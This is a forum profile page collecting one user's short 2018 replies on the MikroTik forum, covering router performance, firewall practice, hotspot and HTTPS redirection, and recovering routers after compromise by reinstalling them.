Forum: General
Topic: Hacked Board
Replies: 15
Views: 1491

Re: Hacked Board

They have enabled packet sniffer to send all passwords, bitcoin private keys, etc to their server. You should format and netinstall with a known good config, once a board is compromised it cannot be safely restored from winbox / terminal alone since a root exploit could have been used.
by R1CH
Mon Dec 31, 2018 8:34 pm
Forum: General
Topic: under attack in port 32231? - help
Replies: 25
Views: 1627

Re: under attack in port 32231? - help

Imagine an attacker is sending small flood of 10mbps, they are TCP packets with spoofed IPs, so your address list is filling up at a rate of 10k+ unique addresses per second which increases memory and CPU usage. Without the rule, the packets would be dropped with no additional overhead.
by R1CH
Mon Dec 31, 2018 4:39 pm
Forum: General
Topic: under attack in port 32231? - help
Replies: 25
Views: 1627

Re: under attack in port 32231? - help

Such rules open you up to resource exhaustion DoS and offer very little protection over a default drop. I would not recommend them.
by R1CH
Mon Dec 31, 2018 4:36 pm
Forum: Announcements
Topic: v6.43.8 [stable] is released!
Replies: 169
Views: 32917

Re: v6.43.8 [stable] is released!

!) telnet - do not allow to set "tracefile" parameter;
After some digging, it turns out this is actually to fix an exploit that enables privilege escalation to root or damage to system files. Why is this not labelled as a security fix?

https://cxsecurity.com/issue/WLB-2018120151
by R1CH
Mon Dec 31, 2018 2:20 am
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

You can indeed TCP proxy a HTTPS connection, eg force google.com to resolve to 1.2.3.4 and then proxy 1.2.3.4:443 -> google.com:443. This does not allow you to redirect or do anything else to it though. If you tried to proxy 1.2.3.4:443 -> myhotspot.com:443, the browser would terminate the connectio...
by R1CH
Mon Dec 31, 2018 1:09 am
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

I'm not talking about a session takeover. In a corporate environment where you can control every device then yes, you can intercept and redirect HTTPS by installing a MITM root cert. However people running a Mikrotik Hotspot are unlikely in such an environment otherwise they would be using EAP / 802...
by R1CH
Sun Dec 30, 2018 11:32 pm
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

They are all wrong. If it was possible to intercept and redirect HTTPS, then what's to stop anyone intercepting online banking and other secure sites?

The wiki article only gives steps for making your hotspot login page HTTPS compliant. This has nothing to do with intercepting HTTPS requests.
by R1CH
Sun Dec 30, 2018 5:22 pm
Forum: General
Topic: how to drop udp attack without port in mikrotik?
Replies: 3
Views: 443

Re: how to drop udp attack without port in mikrotik?

Those are fragments. It looks like you are being attacked by a reflected DNS DDoS amplification attack, there isn't much you can do about it as by the time you could block it it's already consumed your bandwidth. You should also ensure you have correct firewall rules to make sure you aren't actually...
by R1CH
Sun Dec 30, 2018 5:15 pm
Forum: General
Topic: under attack in port 32231? - help
Replies: 25
Views: 1627

Re: under attack in port 32231? - help

All you need is a rule at the end of the input chain with action=drop, with your allow rules before it. Stop trying to be fancy with specific ports, TCP scanners, address lists, etc. These offer no additional benefit over a simple drop rule and actually increase resource usage and open you up to DoS.
by R1CH
Sun Dec 30, 2018 5:12 pm
Forum: General
Topic: Redirect requests from HTTPS
Replies: 13
Views: 3130

Re: Redirect requests from HTTPS

This is NOT POSSIBLE, don't waste your time trying.
by R1CH
Mon Dec 17, 2018 12:19 pm
Forum: General
Topic: IP Cloud question
Replies: 26
Views: 1397

Re: IP Cloud question

If you use an old RouterOS version, the service no longer works. Make sure to update your RouterOS, stop the IP cloud service then start it again.

EDIT: Actually it seems like a service outage, ns1.kissthenet.net and ns2.kissthenet.net are both failing.
by R1CH
Fri Dec 14, 2018 2:07 pm
Forum: RouterBOARD hardware
Topic: CCR1009-8G-1S-1S+ Can't get more than 350-450 Mbps single session, can get more with multiple sessions
Replies: 10
Views: 1199

Re: CCR1009-8G-1S-1S+ Can't get more than 350-450 Mbps single session, can get more with multiple sessions

I had a similar issue, disabled queues / enabling fasttrack helped for me though. I think the problem is the RouterOS kernel is too old to support proper balancing of connections across multiple cores, hopefully this is fixed if / when RouterOS v7 comes out. 350 mbps does seem on the low side though...
by R1CH
Wed Dec 12, 2018 7:23 pm
Forum: General
Topic: hAp ac^2: inferior LAN-to-LAN performance when HW offloading is used
Replies: 5
Views: 517

Re: hAp ac^2: inferior LAN-to-LAN performance when HW offloading is used

I vaguely recall reading something about how mixed speeds cause the switch chip to have to flush buffers before processing a new packet. It's best to put a cheap gigabit switch in front of the device to handle mixed speed devices so only 1gbps devices are connected directly.
by R1CH
Wed Dec 12, 2018 7:20 pm
Forum: General
Topic: Mikrotik Port Scanner -> Filezilla (21) Problem
Replies: 7
Views: 639

Re: Mikrotik Port Scanner -> Filezilla (21) Problem

FTP opens many connections (1 per file), you should make sure your PSD rules are not running if a connection is allowed. It's also very questionable to do anything with PSD since you have no guarantees the IPs you are adding to your lists aren't spoofed.
by R1CH
Tue Dec 11, 2018 1:18 am
Forum: RouterBOARD hardware
Topic: hardware idea for a multiport switch
Replies: 40
Views: 7256

Re: hardware idea for a multiport switch

I agree with the others. 48 port switches / patch panels already have very thick cable bundles, this would be a nightmare to manage cable-wise.
by R1CH
Mon Dec 10, 2018 7:57 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

Really happy with the performance on this device, replaced an aging RB951G that had to used fasttrack and the 4011 handles our 500mbps internet with traffic shaping and IPv6 tunnels with only 25% CPU usage. Only thing I want now is root to install DNSCrypt proxy - anyone found a nice way to root thi...
by R1CH
Fri Dec 07, 2018 11:39 pm
Forum: General
Topic: Supplier requires Iperf Speedtest program
Replies: 8
Views: 667

Re: Supplier requires Iperf Speedtest program

You should always be doing tests "through" the router, the CPUs on the devices are not optimized for generating traffic. Port forwarding is simple enough, iperf only requires a single port or can reverse-connect to an available server.
by R1CH
Fri Dec 07, 2018 11:37 pm
Forum: General
Topic: DNS Flood
Replies: 5
Views: 736

Re: DNS Flood

This image was for 1 second, the client generates that amount several times, figuring out further to find out his CPE was "hacked". But I would like to know about this traffic before it gets worse, in this case I redirected the client to a secondary DNS That's still well within the realm of normal ...
by R1CH
Fri Dec 07, 2018 8:47 pm
Forum: General
Topic: DNS Flood
Replies: 5
Views: 736

Re: DNS Flood

This looks like normal traffic, DNS resolvers use a new socket for every resolution as an added protection against DNS spoofing. I would not consider 28kbps a "flood".
by R1CH
Wed Dec 05, 2018 5:03 pm
Forum: Wireless Networking
Topic: cap AC Critical Errors???
Replies: 9
Views: 896

Re: cap AC Critical Errors???

Either they are not receiving enough power or the power is not good quality. If you're sure the power source is good and they are running the latest firmware and RouterOS then the device is probably defective.
by R1CH
Wed Dec 05, 2018 5:01 pm
Forum: Wireless Networking
Topic: hAPac2 wifi issue [SOLVED]
Replies: 6
Views: 813

Re: hAPac2 wifi issue [SOLVED]

If you're only bothered by the log entry you can turn off "info" category if you don't want to see this.
by R1CH
Wed Dec 05, 2018 1:53 pm
Forum: Wireless Networking
Topic: hAPac2 wifi issue [SOLVED]
Replies: 6
Views: 813

Re: hAPac2 wifi issue [SOLVED]

This usually means the client is using the wrong WPA2 key.
by R1CH
Sat Dec 01, 2018 10:28 pm
Forum: General
Topic: speedtets using 1 core [SOLVED]
Replies: 7
Views: 546

Re: speedtets using 1 core [SOLVED]

This is a known issue with RouterOS v6. Something to do with the kernel / connection tracking most likely.

See also viewtopic.php?t=131503
by R1CH
Fri Nov 30, 2018 12:04 am
Forum: General
Topic: CoDel support?
Replies: 45
Views: 13276

Re: CoDel support?

No new kernel, so no update. Probably need to wait for RouterOS v7 or move to a different platform if you want this.
by R1CH
Fri Nov 30, 2018 12:03 am
Forum: General
Topic: wifi showing OS version to scanner
Replies: 3
Views: 402

Re: wifi showing OS version to scanner

I also want this to be optional. viewtopic.php?f=7&t=133186
by R1CH
Fri Nov 30, 2018 12:01 am
Forum: General
Topic: SSl Certificat For Mikrotik
Replies: 13
Views: 835

Re: SSl Certificat For Mikrotik

Nothing is being redirected, it's entirely up to the browser or OS. The browser sees a HTTPS loading error, tries to load a HTTP URL and notices if there was a redirect. If so, it assumes there is a portal and offers the sign in option. Since the "HTTPS error" is technically an attack, some bigger s...
by R1CH
Thu Nov 29, 2018 11:58 pm
Forum: General
Topic: Improving hotspot/captive portal detection?
Replies: 3
Views: 620

Re: Improving hotspot/captive portal detection?

Those systems work by seeing a HTTPS error, then trying to access a normal HTTP URL. If the HTTP request is redirected, they assume a portal is in use. As long as you're redirecting everything, you should see the same behavior with the Mikrotik hotspot.
by R1CH
Wed Nov 28, 2018 6:05 pm
Forum: General
Topic: SSl Certificat For Mikrotik
Replies: 13
Views: 835

Re: SSl Certificat For Mikrotik

If your device / browser won't detect the portal automatically, then yes, you need to open a non-HTTPS site to get the portal redirect. Most modern browsers and devices do this automatically in the background though when you connect to a new network. There is NO WAY to redirect a HTTPS site!
by R1CH
Mon Nov 26, 2018 4:58 pm
Forum: General
Topic: Improving hotspot/captive portal detection?
Replies: 3
Views: 620

Re: Improving hotspot/captive portal detection?

There is no system that works with HTTPS*. This is by design, if you could intercept a secure page to show your portal, so could anyone else. The only thing you need to do is redirect ALL requests to your hotspot page, even those without a valid hostname (eg http://sdfnsdgnsseg). When a phone / brow...
by R1CH
Fri Nov 23, 2018 8:05 pm
Forum: General
Topic: Mikrotik SSH Vulnerability 6.14+
Replies: 4
Views: 537

Re: Mikrotik SSH Vulnerability 6.14+

It looks like the researcher has retracted their claim. The only remaining issue is that the sshd supports a "null" cipher, which isn't secure - but you have to explicitly ask for it.

https://twitter.com/hackerfantastic/sta ... 9068090369
by R1CH
Fri Nov 23, 2018 5:54 pm
Forum: General
Topic: Hotspot Landing Page
Replies: 3
Views: 665

Re: Hotspot Landing Page

This is intentional behavior - you cannot redirect HTTPS sites to your landing page. Properly configured phones, laptops etc will detect the presence of the portal and redirect users automatically. Make sure your regular HTTP requests are redirecting and you should be fine.
by R1CH
Fri Nov 23, 2018 4:13 pm
Forum: General
Topic: Router Blocking Connections
Replies: 2
Views: 382

Re: Router Blocking Connections

Your blocklist is blocking most of the internet, which is why ping / winbox is not working.
by R1CH
Fri Nov 23, 2018 4:11 pm
Forum: General
Topic: SSl Certificat For Mikrotik
Replies: 13
Views: 835

Re: SSl Certificat For Mikrotik

For the hotspot login page itself, this is possible. For redirecting clients to the hotspot, this is not possible.
by R1CH
Fri Nov 23, 2018 4:05 pm
Forum: General
Topic: Mikrotik SSH Vulnerability 6.14+
Replies: 4
Views: 537

Mikrotik SSH Vulnerability 6.14+

https://twitter.com/hackerfantastic/status/1065838886989922305 Once again, Mikrotik's custom implementation (instead of a well-tested open source version) has introduced a security flaw: The take-away from this is that an attacker could perform a MITM attack against *any* Mikrotik router during the ...
by R1CH
Thu Nov 22, 2018 2:18 am
Forum: Wireless Networking
Topic: Open Wireless network No.2
Replies: 2
Views: 331

Re: Open Wireless network No.2

Set a "none" security profile.

Image
by R1CH
Mon Nov 19, 2018 3:58 pm
Forum: General
Topic: Management high CPU on lots of Mikrotiks today - DDoS??
Replies: 15
Views: 1045

Re: Management high CPU on lots of Mikrotiks today - DDoS??

You clearly don't have a secure firewall if this traffic is able to reach your router. Rather than locking down only management services, you should block all unknown traffic by default. As for the IP - you are actually being used to cause a DDoS against this company. Someone is spoofing the IP of t...
by R1CH
Fri Nov 16, 2018 3:01 pm
Forum: General
Topic: DNS Server IPs disappears abruptly from Hotspot
Replies: 2
Views: 292

Re: DNS Server IPs disappears abruptly from Hotspot

Add them manually? It sounds like they're being sourced from DHCP and then the server is randomly not assigning them for whatever reason.
by R1CH
Fri Nov 16, 2018 2:11 am
Forum: General
Topic: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range
Replies: 6
Views: 607

Re: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range

The clients will get a cert warning because it is very likely that your client request will not match the request (unless they directly went to a URI that matches the Apache server name). As soon as they click through the cert warning you'll be up and running. You can then redirect them to a URI th...
by R1CH
Thu Nov 15, 2018 1:34 am
Forum: Wireless Networking
Topic: RB951G-2HnD (6.43) - connect to internet without cables
Replies: 3
Views: 400

Re: RB951G-2HnD (6.43) - connect to internet without cables

See https://wiki.mikrotik.com/wiki/Manual:I ... s#Repeater

I would not recommend doing this without a wired connection during configuration though.
by R1CH
Thu Nov 15, 2018 1:27 am
Forum: General
Topic: [Request] Add "DNS over HTTPS" to RouterOS (Internet security protocols)
Replies: 13
Views: 2459

Re: [Request] Add "DNS over HTTPS" to RouterOS (Internet security protocols)

I've been using DNS over HTTPS on a rooted RB951 and it's been flawless. No timeouts, no perceptible latency increase and the additional security it brings is very nice. Hopefully this makes it into RouterOS v7.
by R1CH
Thu Nov 15, 2018 1:25 am
Forum: General
Topic: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range
Replies: 6
Views: 607

Re: HTTP/HTTPS/All Traffic Redirect To Certain Website At End Point Router From Specific Ip Range

For HTTP sure, just DNAT them to your webserver. There is no way to do this for HTTPS though.
by R1CH
Thu Nov 15, 2018 1:23 am
Forum: General
Topic: TWO CCRs FULLY UPGRADED AND STILL EXPLOITED (ROOTED) [SOLVED]
Replies: 16
Views: 1574

Re: TWO CCRs FULLY UPGRADED AND STILL EXPLOITED (ROOTED) [SOLVED]

You should always netinstall after a compromise. Mikrotik have stated that there are ways to get OS root access once you have winbox access, so processes at that point aren't visible to RouterOS - even after upgrading there may be a persistent backdoor. Formatting / netinstall is the only safe way (...
by R1CH
Sun Nov 11, 2018 8:23 pm
Forum: Wireless Networking
Topic: Problem with wAP AC
Replies: 7
Views: 796

Re: Problem with wAP AC

You've got some misconfigured IPs there for your WAN and LAN connections. First, they shouldn't be the same IP or the router won't know which interface to use, and secondly you have a /8 subnet on the WAN, that certainly can't be right. I'm not sure what your intended configuration is supposed to be...
by R1CH
Fri Nov 09, 2018 4:10 pm
Forum: Announcements
Topic: Newsletter 85
Replies: 30
Views: 9750

Re: Newsletter 85

Good luck getting 150mbps from a 2.4 GHz network that's not even inside the building!
by R1CH
Fri Nov 09, 2018 4:06 pm
Forum: General
Topic: Management Network for router access?
Replies: 10
Views: 778

Re: Management Network for router access?

On one of my bigger networks I have a dedicated management VLAN. RouterOS is firewalled on every interface except this VLAN, so it only performs routing. I have a Linux box on the management network running wireguard that allows me to remote in, I trust wireguard far more than any of the RouterOS VP...
by R1CH
Fri Nov 09, 2018 3:15 pm
Forum: Announcements
Topic: Newsletter 85
Replies: 30
Views: 9750

Re: Newsletter 85

The device could also be used in places where the signal is just average, in order to boost a low speed into 100mbps+ throughput. Only having an FE port already kills this use case though. There's really no reason why devices that have 100mbps+ possible on the radio side are still shipping with FE p...
by R1CH
Thu Nov 08, 2018 6:42 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 7
Views: 2767

Re: Qualcomm IPQ8074

Another 11ax product just launched now, putting indeed some pressure on having 11ax products to use. Mechanical design is more questionable, but that can easily be changed (and I like the plane/rocket style of the RAX120, it has a big WOW factor). https://www.netgear.com/home/products/networking/wi...
by R1CH
Tue Nov 06, 2018 4:06 pm
Forum: Announcements
Topic: Newsletter 85
Replies: 30
Views: 9750

Re: Newsletter 85

Was hoping for some 802.11ax news... really hope there's something coming soon!
by R1CH
Mon Nov 05, 2018 6:24 pm
Forum: General
Topic: Firmware upgrade?
Replies: 3
Views: 393

Re: Firmware upgrade?

This is an unfortunate side effect of the new firmware version scheme. The firmware version always shows the same as RouterOS version now, even if there have been no changes between the previous firmware version. The only way to know for sure if there's really been an update is to read through chang...
by R1CH
Mon Nov 05, 2018 6:20 pm
Forum: RouterBOARD hardware
Topic: FTTH FIBER 200MB
Replies: 4
Views: 751

Re: FTTH FIBER 200MB

At that speed you should make sure fasttrack is working, I have 500mbps with fasttrack no problems.
by R1CH
Sat Nov 03, 2018 12:51 am
Forum: General
Topic: PB HTTPS (SSL) on Hotspots : Urgent
Replies: 2
Views: 291

Re: PB HTTPS (SSL) on Hotspots : Urgent

Abandon your quest! As long as you aren't whitelisting the connectivity test domains used my modern devices and browsers, they will pop up the captive portal login automatically. Trying to intercept HTTPS requests is impossible, if you could do it then so could anyone on the network (internet), defe...
by R1CH
Wed Oct 31, 2018 6:13 pm
Forum: General
Topic: Strange loop on update from 6.37.3 to 6.43.4
Replies: 5
Views: 580

Re: Strange loop on update from 6.37.3 to 6.43.4

Given the severity of the exploits, it's best to netinstall with a known good config. System level access allows attackers to install malware that isn't visible to RouterOS / winbox.
by R1CH
Wed Oct 31, 2018 1:25 pm
Forum: Wireless Networking
Topic: wpa3
Replies: 5
Views: 1252

Re: wpa3

Qualcomm even shared that the WPA3 security features will be incorporated in its chipsets for mobile devices starting with the Snapdragon 845 mobile platform in June 2018. WPA3 will be supported on all Qualcomm Access Point platforms by July 2018. Doesn't seem like this should require hardware supp...
by R1CH
Wed Oct 31, 2018 1:19 pm
Forum: General
Topic: Old kernel. Why?
Replies: 5
Views: 701

Re: Old kernel. Why?

One of the issues is that Mikrotik wrote a lot of their own proprietary kernel modules, they likely aren't compatible with newer kernels. It's a shame as a lot of the included drivers with newer kernels are much higher quality than Mikrotik's implementations (eg the QCA driver supports Wave 2 802.11...
by R1CH
Mon Oct 29, 2018 6:29 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 631

Re: Advanced IP scanners locks up winbox access?

I ended up power cycling which resolved the issue (for now). Very strange, hopefully this doesn't happen to routers I don't have physical access to!
by R1CH
Mon Oct 29, 2018 6:28 pm
Forum: General
Topic: MikroTik and SSL website (Comodo)
Replies: 5
Views: 573

Re: MikroTik and SSL website (Comodo)

Have you set MTU appropriately and enabled PMTU clamping if necessary?
by R1CH
Mon Oct 29, 2018 6:27 pm
Forum: General
Topic: Performance problems with CRS112-8P-4S
Replies: 4
Views: 1237

Re: Performance problems with CRS112-8P-4S

The "S" in CRS112-8P-4S stands for SWITCH. Stop trying to use it as a router and you won't have these problems.

the switching power seems to be ok, the connected computers can send and receive with the full bandwith of 1GBit.
by R1CH
Sun Oct 28, 2018 3:24 pm
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 16962

Re: CloudFlare DNS over TLS

Not sure, supposedly the update process wipes out any non-standard files so I'm not going to update until I have a very good reason to. I imagine Mikrotik will silently patch the jailbreak so I don't know how long this will be possible.
by R1CH
Fri Oct 26, 2018 7:03 pm
Forum: General
Topic: DHCP Rebinding Issue - stuck in rebinding until lease times out
Replies: 3
Views: 520

Re: DHCP Rebinding Issue - stuck in rebinding until lease times out

I've also seen this behavior at times. The Mikrotik DHCP client seems to have no end of little quirks and bugs like this, I wish we could just use udhcp which comes as part of busybox, it's well tested and should handle these kinds of cases much better.
by R1CH
Fri Oct 26, 2018 5:50 pm
Forum: General
Topic: How recovery hacked RB2011 via JTAG ?
Replies: 3
Views: 590

Re: How recovery hacked RB2011 via JTAG ?

Why can you not netinstall?
by R1CH
Fri Oct 26, 2018 5:49 pm
Forum: General
Topic: Firewall rules not working after hacker infection
Replies: 3
Views: 474

Re: Firewall rules not working after hacker infection

You should netinstall with a known good config. Once a router is compromised an attacker can get system level access that you cannot detect or repair from RouterOS UI.
by R1CH
Thu Oct 25, 2018 5:51 pm
Forum: General
Topic: firewall [SOLVED]
Replies: 5
Views: 658

Re: firewall [SOLVED]

Be aware that the default config in the latest "stable" version has no firewall either.

viewtopic.php?f=2&t=140661
by R1CH
Thu Oct 25, 2018 5:50 pm
Forum: General
Topic: Established connection question
Replies: 3
Views: 401

Re: Established connection question

These are connections to a service on your router. If you don't recognize them, your router might be compromised and running backdoor PPTP services, web proxy, SOCKS, etc.
by R1CH
Wed Oct 24, 2018 3:42 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 879

Re: Port Scan Drop ?

Port scan does not use established connections. If you're using a detect-and-block script, then the attacker can then just scan you with fake IP of Google, Facebook, DNS server, etc and suddenly you've blocked important services. Relying on a hidden port for security is not good, best to use a VPN o...
by R1CH
Wed Oct 24, 2018 2:25 pm
Forum: General
Topic: Missing default config after reset
Replies: 3
Views: 350

Re: Missing default config after reset

The default config was broken in the latest releases.

viewtopic.php?f=2&t=140661
by R1CH
Wed Oct 24, 2018 1:43 pm
Forum: General
Topic: Port Scan Drop ?
Replies: 6
Views: 879

Re: Port Scan Drop ?

Best practice says you should drop all unknown input, there's no need to make rules specifically for port scanners.
by R1CH
Wed Oct 24, 2018 12:44 pm
Forum: General
Topic: Default configuration is broken?
Replies: 5
Views: 736

Re: Default configuration is broken?

QA on updates is getting quite poor lately. How does a change like this even happen to a "bugfix only" branch?
by R1CH
Tue Oct 23, 2018 4:21 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 631

Re: Advanced IP scanners locks up winbox access?

No RADIUS / user manager or anything for me, just a simple SOHO setup.
by R1CH
Tue Oct 23, 2018 2:02 pm
Forum: RouterBOARD hardware
Topic: New High End Router Hardware Soon?
Replies: 11
Views: 1783

Re: New High End Router Hardware Soon?

Since TILE is a dead architecture in the Linux kernel there needs to be a high end model that will handle RouterOS v7 (if it ever comes out). I am worried more and more about how old the RouterOS v6 kernel is, many modern chipsets (both CPU and wireless etc) require newer kernels so the available ha...
by R1CH
Tue Oct 23, 2018 1:59 pm
Forum: RouterBOARD hardware
Topic: HAP AC2 Availability in the US
Replies: 11
Views: 1833

Re: HAP AC2 Availability in the US

I notice even EuroDK no longer has hAP AC2 in stock. Is there some kind of problem with the board that halted production?
by R1CH
Tue Oct 23, 2018 1:56 pm
Forum: General
Topic: Advanced IP scanners locks up winbox access?
Replies: 7
Views: 631

Re: Advanced IP scanners locks up winbox access?

I wonder if I'm experiencing the same issue. I'm locked out of winbox, webfig, mac-telnet and SSH on one of my routers, if I enter an incorrect username or password I immediately get a negative response, with the correct password the connection hangs for about a minute then says "Incorrect password".
by R1CH
Tue Oct 23, 2018 12:59 pm
Forum: General
Topic: How can I distinguish different certificate in Winbox?
Replies: 1
Views: 201

Re: How can I distinguish different certificate in Winbox?

Modern versions of RouterOS uses SRP protocol to avoid MITM. Prior to this, there was no host verification so MITM was easy.

https://en.wikipedia.org/wiki/Secure_Re ... d_protocol
by R1CH
Mon Oct 22, 2018 1:06 am
Forum: General
Topic: CloudFlare DNS over TLS
Replies: 41
Views: 16962

Re: CloudFlare DNS over TLS

I've got DNS over TLS working on my hEX! If you've rooted your device (don't contact MT for support if you do this!) it's quite straightforward to install. Since cloudflared is written in Go, it's easy to cross-compile and the only thing it needs to operate is a ca-certificates.crt bundle which I co...
by R1CH
Tue Oct 16, 2018 2:22 pm
Forum: RouterBOARD hardware
Topic: Qualcomm IPQ8074
Replies: 7
Views: 2767

Re: Qualcomm IPQ8074

Given how long it took for 802.11ac (which still isn't fully implemented!), I think it will be 2020 or later before Mikrotik come out with 802.11ax products :(.
by R1CH
Tue Oct 16, 2018 1:33 am
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2963

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

Finally had some time to play around with this. It works very well and there is almost zero risk of bricking your device. Can't wait to start experimenting with custom software on my router at last!
by R1CH
Fri Oct 12, 2018 5:28 pm
Forum: General
Topic: Jailbreak for RouterOS 6.43.2 released [SOLVED]
Replies: 16
Views: 2963

Re: Jailbreak for RouterOS 6.43.2 released [SOLVED]

I wish there were an official way to do this rather than relying on tools that potentially cause issues or stop working in the future. Installing wireguard for example or proper openvpn with UDP support would be so useful.
by R1CH
Wed Oct 10, 2018 6:19 pm
Forum: General
Topic: Limiting ICMP on input chain
Replies: 3
Views: 913

Re: Limiting ICMP on input chain

Reminder that ICMP source addresses can be spoofed, adding addresses to a blacklist without being able to verify the source address is a bad practice. It's better to just rate limit (which is built into the kernel - check IP / Settings).
by R1CH
Wed Oct 10, 2018 1:15 pm
Forum: General
Topic: Can't Upgrade router mikrotik because hacked
Replies: 7
Views: 2113

Re: Can't Upgrade router mikrotik because hacked

The ONLY safe way is to netinstall. The exploit can install files outside of RouterOS, so your router remains compromised even after a config reset. You can still export your config and import it again after sanitizing it.
by R1CH
Tue Oct 09, 2018 12:19 am
Forum: RouterBOARD hardware
Topic: Improove capacitor quality
Replies: 3
Views: 862

Re: Improove capacitor quality

How are we still having failing capacitors in 2018?!
by R1CH
Mon Oct 08, 2018 10:38 pm
Forum: General
Topic: CVE-2018-1156 and Winbox exploit
Replies: 0
Views: 674

CVE-2018-1156 and Winbox exploit

There's quite a few blogs going around today which makes it sound like there is some new Mikrotik exploit. It's not a new exploit, but discussions about the combination of the already patched winbox exploit + the already patched CVE-2018-1156 format string exploit. If a router is vulnerable to the w...
by R1CH
Mon Oct 08, 2018 1:04 pm
Forum: General
Topic: Router is infection by virus coinhive
Replies: 4
Views: 6477

Re: Router is infection by virus coinhive

Updating RouterOS won't magically remove bad parts of your configuration, it only prevents future exploits (assuming you changed your passwords). It's up to you to disinfect the router, the recommended way is to netinstall with a known good config, otherwise export the config, reset to default then ...
by R1CH
Sat Oct 06, 2018 5:09 pm
Forum: General
Topic: Unable to get full gigabit speed on RB750Gr3
Replies: 28
Views: 3828

Re: Unable to get full gigabit speed on RB750Gr3

Most likely the device is not powerful enough, check system / resources while testing to check CPU usage.
by R1CH
Fri Oct 05, 2018 2:54 pm
Forum: Wireless Networking
Topic: IPQ4019 chipsets - random capacity loss
Replies: 8
Views: 1186

Re: IPQ4019 chipsets - random capacity loss

Many devices from other manufacturers use the IPQ401x chipset without issue. I suspect the problem is more to do with Mikrotik's proprietary driver than the ARM platform itself.
by R1CH
Fri Oct 05, 2018 12:50 pm
Forum: Wireless Networking
Topic: New standard 802.11ax
Replies: 25
Views: 6434

Re: New standard 802.11ax

Any news? ASUS are releasing their RT-AX88U this month which is based on 802.11ax. Would love for Mikrotik to keep up with the home / office wifi space.
by R1CH
Thu Oct 04, 2018 12:19 am
Forum: General
Topic: Route cast to another VLAN
Replies: 3
Views: 303

Re: Route cast to another VLAN

Easiest solution is to put the TV on the guest VLAN, usually such devices are insecure and should be away from your main network anyway. Otherwise you will need to allow routing between the VLANs and forward the multicasts with something like https://github.com/sonicsnes/udp-broadcast-relay-redux
by R1CH
Wed Oct 03, 2018 3:43 pm
Forum: General
Topic: Router compromised even after updating firmware
Replies: 2
Views: 231

Re: Router compromised even after updating firmware

If you backed up from before the compromise, then the backup is safe to use. You can also export the compromised config and manually review it before importing it on a fresh router with changed passwords.
by R1CH
Mon Oct 01, 2018 3:41 pm
Forum: Wireless Networking
Topic: hap ac achievable wifi speed?
Replies: 28
Views: 2177

Re: hap ac achievable wifi speed?

Real world result from a phone in a room across from the hAP AC (wall mounted high up). Almost clear LOS (has to go through a doorway). -57 dBm on the hAP AC, -54 dBm on the phone. Upload limited by ISP.

Image
by R1CH
Mon Oct 01, 2018 3:33 pm
Forum: General
Topic: dns requests to Mikrotik fail if udp on linux
Replies: 5
Views: 368

Re: dns requests to Mikrotik fail if udp on linux

I have an open ticket (#2016082522001037) about bad DNS behavior with the RB850Gx2, apparently with multi core some UDP packets are simply dropped. Perhaps it applies to the RB3011 also. This is a problem since the Linux resolver likes to send two queries at once, one for IPv4 and one for IPv6. Try ...
by R1CH
Mon Oct 01, 2018 3:30 pm
Forum: General
Topic: Winbox Protocol Dissector
Replies: 2
Views: 433

Re: Winbox Protocol Dissector

Very nice, this will make finding vulnerabilities in the protocol much easier!
by R1CH
Fri Sep 28, 2018 3:08 pm
Forum: General
Topic: something is wrong with my DNS resolving...
Replies: 8
Views: 670

Re: something is wrong with my DNS resolving...

Also be sure to change all passwords, if you ran a vulnerable version then the attacker got full access to all passwords on user accounts.
by R1CH
Thu Sep 27, 2018 10:52 pm
Forum: General
Topic: Suspect script foun
Replies: 3
Views: 866

Re: Suspect script foun

Do a netinstall with the latest version, use a known good config and change all passwords.
by R1CH
Thu Sep 27, 2018 2:23 pm
Forum: General
Topic: Ports Filtered regardless of firewall rules
Replies: 1
Views: 656

Re: Ports Filtered regardless of firewall rules

If you're testing from outside your own LAN, this is almost certainly done by your ISP as those are commonly abused ports.
by R1CH
Thu Sep 27, 2018 2:21 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

Has anyone been able to order one of these yet? Seems like the expected stock arrival dates keep getting pushed back.
by R1CH
Thu Sep 27, 2018 2:19 pm
Forum: General
Topic: Mikrotik How to SSH from Linux to Mikrotik without Password
Replies: 2
Views: 482

Re: Mikrotik How to SSH from Linux to Mikrotik without Password

Agreed, you should not be using DSA in 2018. Even RSA isn't great, but Ed25519 keys are not yet supported by Mikrotik.
by R1CH
Wed Sep 26, 2018 3:35 pm
Forum: RouterBOARD hardware
Topic: RB4011
Replies: 354
Views: 65350

Re: RB4011

I've had no issues with fs.com 10G DACs between Mikrotik, Netgear and Linksys gear. The stuff is all from China but they seem to have their logistics nailed down pretty well which is how they can offer such good pricing. I know a lot of other people in the industry also use FS so it's not like they'...
by R1CH
Thu Sep 20, 2018 6:16 pm
Forum: General
Topic: Swift mailer issue: not compatible with php router os api
Replies: 1
Views: 212

Re: Swift mailer issue: not compatible with php router os api

This doesn't seem to have anything to do with RouterOS API, your Swift installation seems broken:
Class Swift_SmtpTransport could not be loaded from Swift\SmtpTransport.php, file does not exist
by R1CH
Thu Sep 20, 2018 4:41 pm
Forum: Announcements
Topic: v6.43.1 [stable] and v6.43.2 [stable] are released!
Replies: 186
Views: 38217

Re: v6.43.1 [stable] and v6.43.2 [stable] is released!

Breaking the bootloader in a "stable" release... :lol:
by R1CH
Wed Sep 19, 2018 7:54 pm
Forum: RouterBOARD hardware
Topic: RB1100 dead
Replies: 12
Views: 1295

Re: RB1100 dead

Based on this topic it seems the bootloader is damaged. You may find more advice here:

viewtopic.php?t=133750
by R1CH
